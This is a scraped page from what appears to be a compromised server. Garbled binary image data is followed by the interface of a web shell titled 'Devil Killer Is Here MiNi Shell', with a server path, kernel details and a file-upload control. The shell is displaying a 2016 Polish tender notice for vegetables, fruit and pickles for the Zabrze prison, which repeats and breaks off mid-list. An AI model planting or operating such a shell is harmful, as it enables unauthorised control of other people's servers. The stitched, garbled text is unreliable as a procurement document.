JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160518/55177-N-2016.html

<p class="kh_header"><b>Zabrze: DOSTAWA WARZYW,OWOCÓW I KISZONEK DO ZAKŁADU KARNEGO W ZABRZU</b><br>
<b>Numer ogłoszenia: 55177 - 2016; data zamieszczenia: 18.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Janika 12, 41-806 Zabrze, woj. śląskie, tel. 0-32 373 66 30, faks 0-32 373 66 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA WARZYW,OWOCÓW I KISZONEK DO ZAKŁADU KARNEGO W ZABRZU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

 Część I  - warzywa

1.  Buraki ćwikłowe KLASA I  -ilość  8 000 kg

	całe, bez zmian powstałych podczas zbioru lub pakowania,
	jędrne, bez objawów zwiędnięcia,
	zdrowe, bez objawów zapatrzeń, zmarznięcia i gnicia,
	bez szkodników i śladów po szkodnikach,
	czyste, bez obcych zanieczyszczeń, bez grudek ziemi,
	prawidłowo wykształcone,
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	czyszczone,
	wielkość średnica 60-90mm
	schłodzone do 2-5 stopni C,
	burak niedopuszczalny nie doczyszczony, ze śladami po gryzoniach, z objawami zepsucia,
2.  Marchew KLASA I - ilość  13 000 kg
	cała, bez żadnych uszkodzeń (marchew nie może mieć uciętych głów oraz odłamanych korzeni bocznych),
	zdrowa, bez objawów gnicia lub takiego zepsucia, które czynią ją niezdatną do spożycia,
	czysta, wolna od nadmiernego zabrudzenia i zanieczyszczeń,
	jędrna,
	wolna od szkodników lub uszkodzeń spowodowanych przez szkodniki,
	nie zdrewniała,
	bez oznak świadczących o wyrastaniu korzenia w pęd nasienny,
	bez rozwidleń i bocznych rozgałęzień (marchew powinna mieć tylko pojedynczy korzeń bez żadnych rozwidleń) 
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	dopuszczalne są niewielkie wady kształtu, barwy, zabliźnione pęknięcia lub szczeliny pod warunkiem, że są płytkie, czyste i suche,
	różnica średnic pomiędzy najmniejszą i największą marchwią w opakowaniu jednostkowym nie powinna być większa niż 30mm, jeśli marchew jest sortowana według średnicy, a w przypadku sortowania marchwi według masy, różnica mas nie powinna być większa niż 200g,
	twarda, jędrna, bez śladów okrawania,
		
3.  Seler  KLASA I - ilość 9 000 kg
	zdrowy bez śladów gnicia,                                                                                                                                    
	cały, korzeń prawidłowo wykształcony, gładki,
	bez ordzawień skórki,
	czysty, myty, wysuszony,
	bez uszkodzeń mechanicznych i stłuczeń,
	twardy, jędrny,
	bez oznak zmarznięcia,
	bez szkodników i śladów po szkodnikach,
	o świeżym wyglądzie,
	na przekroju biały lub biało-kremowy,
	bez pustych przestrzeni,
	bez oznak wyrastania pędów kwiatostanowych,
	bez obcych zapachów i posmaków,
	seler niedopuszczalny: niecały, objawami zepsucia, 
	twarda, jędrna, bez śladów okrawania,
4.  Pietruszka KLASA I - ilość 6 000 kg
	zdrowa bez śladów gnicia,
	cała, korzeń prawidłowo wykształcony, gładki,
	bez ordzawień skórki,
	czysta, myta, wysuszona,
	bez uszkodzeń mechanicznych i stłuczeń,
	twarda, jędrna,
	bez oznak zmarznięcia,
	bez szkodników i śladów po szkodnikach,
	o świeżym wyglądzie,
	na przekroju biała lub biało-kremowa,
	bez pustych przestrzeni,
	korzeń bez rozwidleń i bocznych rozgałęzień,
	bez oznak wyrastania pędów kwiatostanowych,
	bez obcych zapachów i posmaków,
	w klasie I średnica korzenia mierzona w najszerszym przekroju od 2 do 4 cm,
	pietruszka niedopuszczalna niecała, z objawami zepsucia,
	twarda, jędrna, bez śladów okrawania,

5.  Cebula  KLASA I - ilość 9 000 kg
	cała, bez żadnych uszkodzeń,
	zdrowa, bez objawów gnicia lub takiego zepsucia, które czynią ją niezdatną do spożycia,
	czysta, wolna od jakichkolwiek zanieczyszczeń obcych,
	wolna od szkodników lub uszkodzeń spowodowanych przez szkodniki,
	wystarczająco sucha, pokryta suchą łuską, która może być lekko zielona,
	wystarczająco rozwinięta, jędrna i zwarta oraz wolna od obcych zapachów i smaków,
	o średnicy 35mm, max 50mm,
6.  Kapusta biała świeża KLASA I - ilość 6 500 kg
	w stanie nienaruszonym,
	o świeżym wyglądzie,
	nie popękana, bez oznak wyrastania kwiatostanu,
	zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
	bez zgnieceń i uszkodzeń,
	wolna od owadów lub innych pasożytów,
	pozbawiona uszkodzeń spowodowanych mrozem,
	czysta, tzn: wolna od jakichkolwiek substancji obcych,
	pozbawiona nadmiernego zawilgocenia zewnętrznego,
	wolna od wszelkich obcych zapachów i smaków,
	łodyga powinna być ucięta tuż poniżej najniższego punktu, z którego wyrasta liść liście powinny ściśle przylegać do siebie, a miejsce cięcia powinno być czyste,
	wielkość kapusty głowiastej określa się według wagi netto. Nie może on wynosić mniej niż 350 gramów dla jednej główki,
	każde opakowanie lub partia, w przypadku przewożenia luzem, musi zawierać kapustę tego samego pochodzenia, odmiany i jakości,
	główki kapusty muszą być jednolite pod względem kształtu i barwy,
	opakowanie musi zapewniać właściwą ochronę kapusty(może być dostarczana w workach)
7.  Kapusta czerwona świeża KLASA I - ilość  5 000 kg
	w stanie nienaruszonym,
	o świeżym wyglądzie,
	nie popękana, bez oznak wyrastania kwiatostanu,
	zdrowa, wyklucza się produkt z objawami gnicia lub pogorszenia, które powoduje jej nieprzydatność do spożycia,
	bez zgnieceń i uszkodzeń,
	wolna od owadów lub innych pasożytów,
	pozbawiona uszkodzeń spowodowanych mrozem,
	czysta, tzn wolna od jakichkolwiek substancji obcych,
	pozbawiona nadmiernego zawilgocenia zewnętrznego,
	wolna od wszelkich obcych zapachów i smaków,
	łodyga powinna być ucięta tuż poniżej najniższego punktu, z którego wyrasta liść liście powinny ściśle przylegać do siebie, a miejsce cięcia powinno być czyste,
	wielkość kapusty głowiastej określa się według wagi netto. Nie może on wynosić mniej niż 350 gramów dla jednej główki,
	każde opakowanie lub partia, w przypadku przewożenia luzem, musi zawierać kapustę tego samego pochodzenia, odmiany i jakości,
	główki kapusty muszą być jednolite pod względem kształtu i barwy,
	opakowanie musi zapewniać właściwą ochronę kapusty(może być dostarczana w workach)

Część II owoce
1.  Grejpfrut - ilość 400 kg
	całe,
	wolne od odgnieceń lub nadmiernych zabliźnionych skaleczeń,	zdrowe; nie dopuszcza się owoców z objawami gnicia lub zepsucia, króre czynią je niezdatnymi do spożycia,
	czyste tzn; wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	wolne od oznak wewnętrznego wysychania,
	wolne od uszkodzeń spowodowanych niskimi temperaturami lub mrozem,
	wolne od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	dobrej jakości,
	mieć cechy charakterystyczne dla danej odmiany lub typu handlowego,
	dopuszcza się niewielkie wady kształtu i barwy oraz niewielki wady skórki powstające podczas kształtowania owocu jak osrebrzenie, ordzawienie itp., jak również niewielkie, zabliźnione uszkodzenia mechaniczne jak uszkodzenia gradowe, otarcia, uszkodzenia w czasie manipulacji itp., pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd owoców oraz ich jakość,

2.    Jabłka - 1 500 kg
	całe, 
	zdrowe nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia,
	czyste tzn wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	wolne od nadmiernego zawilgocenia powierzchniowego,	bez obcych zapachów lub smaków,
	niedopuszczalne są owoce; nie w pełni rozwinięte lub niedojrzałe, które więdną w czasie składowania oraz są kwaśne i twarde, co dyskwalifikuje je pod względem przydatności do spożycia, przejrzałe, które po wystawieniu z chłodni wykazują wady takie jak wewnętrzne obrązowienie, oparzelinę przechowalniczą czy wady spowodowane zbyt niską temperaturą,
	mieć kształt, wielkość i barwę charakterystyczne dla danej odmiany,
	dopuszcza się występowanie pewnych wad, jak niewielkie wady rozwoju, niewielkie wady barwy, niewielkie wady skórki, lekkie odgniecenia.


Część III kiszonki

1.  Kapusta kiszona - ilość  8 000 kg

	produkt spożywczy otrzymany z kapusty głowiastej białej, 
	oczyszczonej z liści zewnętrznych, 
	pokrojonej, 
	zasolonej i poddanej naturalnemu procesowi fermentacji  mlekowej, 
	opakowanie - beczki
	min. okres przydatności 3 m-ce od dnia dostawy
2.  Ogórki kiszone - ilość 4 000 kg
	produkt spożywczy otrzymany z ogórków, przypraw, aromatyczno smakowych, zalanych zalewą z dodatkiem soli i poddanych naturalnemu procesowi fermentacji mlekowej,
	z ewentualnym dodatkiem kwasu sorbowego, 
	struktura- dość luźno ułożone całe ogórki,
	jędrne, 
	chrupkie, 
	opakowanie- beczki  
	min. okres przydatności 3 m-ce od dnia dostawy


Część IV pieczarki, ogórki i pomidory świeże

1.  Pieczarka świeża - 100 kg
	całe, 
	zdrowe nie dopuszcza się pieczarek z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia,
	czyste tzn wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników i uszkodzeń spowodowanych przez szkodniki,
	bez obcych zapachów lub smaków,

2.  Ogórek świeży -  400 kg
	cały tzn, bez żadnych ubytków i uszkodzeń,
	zdrowe, bez objawów gnicia lub takiego zepsucia, które czynią je niezdatne do spożycia,
	o świeżym wyglądzie,
	wolne od jakichkolwiek zanieczyszczeń obcych,
	wolne od szkodników lub uszkodzeń spowodowanych przez szkodniki
	wolne od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	bez gorzkiego smaku,
	ogórki powinny być właściwie wykształcone, o dostatecznie typowym kształcie i praktycznie proste,
	dopuszcza się następujące wady: lekkie zniekształcenie, z wyjątkiem zniekształceń spowodowanych przerośnięciem nasion, niewielkie wady barwy, szczególnie jasne zabarwienie w części ogórka stykającej się z ziemią podczas wzrostu, lekkie uszkodzenia skórki spowodowane otarciem, manipulacją lub niską temperaturą, pod warunkiem że są zbliżone i nie wpływają ujemnie na trwałość produktu,

3.  Pomidor świeży -  500 kg
	cały tzn, bez żadnych ubytków i uszkodzeń,
	zdrowy, bez objawów gnicia lub takiego zepsucia, które czynią je niezdatne do spożycia,
	o świeżym wyglądzie,
	wolny od jakichkolwiek zanieczyszczeń obcych,
	wolny od szkodników lub uszkodzeń spowodowanych przez szkodniki
	wolny od nadmiernego zawilgocenia powierzchniowego,
	bez obcych zapachów lub smaków,
	pomidory powinny być dobrej jakości, wystarczająco jędrne i mieć cechy charakterystyczne dla danej odmiany (nie dopuszcza się pęknięć i widocznych zielonych piętek),
	dopuszcza się lekkie wady kształtu, rozwoju, barwy lub bardzo lekkie odgniecenia oraz deformacje, pod warunkiem, że nie wpływają one ujemnie na ogólny wygląd pomidorów, ich trwałość i wygląd w opakowaniu,
	o średnicy 50mm i powyżej, lecz poniżej 70mm,


Część V Ziemniaki

1.  Ziemniaki jadalne późne  - ilość  135 000 kg

	całe bez ran powstałych podczas zbioru lub pakowania,	jędrne, bez objawów zwiędnięcia,
	zdrowe, bez objawów zapatrzeń, zmarznięcia i gnicia,
	bez szkodników i śladów po szkodnikach,
	czyste, bez obcych zanieczyszczeń, bez grudek ziemi,
	prawidłowo wykształcone,
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	bez śladów kwitnięcia,
	oczyszczone,
	jednolite odmianowo (kształt typowy dla danej odmiany, miąższ średnio zwięzły, nie         rozsypującym się, bulwy duże okrągło owalne, oczka płytkie, skórka gładka), 
	bez pustych miejsc w środku ziemniaka,
	średnica poprzeczna od 4 do 5 cm, podłużna od 6 do 7 cm,
	dopuszczalne tolerancje dla ziemniaka: kłębów nie odpowiadających wymaganiom            jakościowym - 5%,
	ziemniak niedopuszczalny: nie doczyszczony, ze śladami po gryzoniach, z objawami        zepsucia,
	pakowane w worki 25-30 kg,

Art. żywnościowe będą dostarczane do magazynu żywnościowego zamawiającego,                 środkiem transportu, spełniającym wymogi określone w Ustawie z dnia 25 sierpnia 2006r.                               o bezpieczeństwie żywności i żywienia (Dz.U.z 2010r Nr 136, poz.914 j.t) którym dysponuje       wykonawca, bez dodatkowych opłat w dni robocze od poniedziałku do czwartku w ilościach     wskazanych przez zamawiającego, raz w tygodniu w godz. 7.30 - 12.30.  		                                                                            
Zamawiający  będzie składał zamówienia faxem bądź e-mail, sukcesywnie, według potrzeb.
Wymagana jest jednakowa data przydatności do spożycia dla całej partii dostarczanego            produktu.
Wymagana jest jednakowa gramatura opakowania przy każdorazowej dostawie przez cały okres
trwania umowy.	
Wykonawca zobowiązuje się dostarczać zamówiony towar w ciągu 36 godzin, od chwili złożenia    zamówienia , a dostarczone art. żywnościowe powinny odpowiadać, co do jakości wymogom      wynikającym z obowiązujących przepisów prawa.
Odbioru towaru - ustalenia ilości i organoleptycznej oceny jakości będzie dokonywał upoważniony pracownik: magazynier żywnościowy.
Minimalny oczekiwany okres zapłaty wynosi 14 dni od dnia otrzymania faktury..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty w przypadkach wymienionych poniżej (zgodnie z art. 144 ust. 1 ustawy Pzp):
 -  zmiana osób reprezentujących strony w przypadku zmian organizacyjnych,
 -  zmiana przepisów powszechnie obowiązujących, która wymusza zmianę treści umowy.
 -  zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy
    a są one korzystne dla  Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Zabrzu, ul.Ks. Pawła Janika 12, 41-806 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: Zakład Karny w Zabrzu, ul.Ks. Pawła Janika 12, 41-806 Zabrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I  - warzywa:

1.  Buraki ćwikłowe KLASA I  -ilość  8 000 kg

	całe, bez zmian powstałych podczas zbioru lub pakowania,
	jędrne, bez objawów zwiędnięcia,
	zdrowe, bez objawów zapatrzeń, zmarznięcia i gnicia,
	bez szkodników i śladów po szkodnikach,
	czyste, bez obcych zanieczyszczeń, bez grudek ziemi,
	prawidłowo wykształcone,
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	czyszczone,
	wielkość: średnica 60-90mm
	schłodzone do 2-5 stopni C,
	burak niedopuszczalny: nie doczyszczony, ze śladami po gryzoniach, z objawami zepsucia,
2.  Marchew KLASA I - ilość  13 000 kg
	cała, bez żadnych uszkodzeń (marchew nie może mieć uciętych głów oraz odłamanych korzeni bocznych),
	zdrowa, bez objawów gnicia lub takiego zepsucia, które czynią ją niezdatną do spożycia,
	czysta, wolna od nadmiernego zabrudzenia i zanieczyszczeń,
	jędrna,
	wolna od szkodników lub uszkodzeń spowodowanych przez szkodniki,
	nie zdrewniała,
	bez oznak świadczących o wyrastaniu korzenia w pęd nasienny,
	bez rozwidleń i bocznych rozgałęzień (marchew powinna mieć tylko pojedynczy korzeń bez żadnych rozwidleń) 
	bez zawilgocenia powierzchniowego,
	bez obcych zapachów i smaków,
	dopuszczalne są niewielkie wady kształtu, barwy, zabliźnione pęknięcia lub szczeliny pod warunkiem, że są płytkie, czyste i suche,
	różnica średnic pomiędzy najmniejszą i największą marchwią w opakowaniu jednostkowym nie powinna być większa niż 30mm, jeśli marchew jest sortowana według średnicy, a w przypadku sortowania marchwi według masy, różnica mas nie powinna być większa niż 200g,
	twarda, jędrna, bez śladów okrawania,
		
3.  Seler  KLASA I - ilość 9 000 kg
	zdrowy bez śladów gnicia,                                                                                                                                    
	cały, korzeń prawidłowo wykształcony, gładki,
	bez ordzawień skórki,
	czysty, myty, wysuszony,
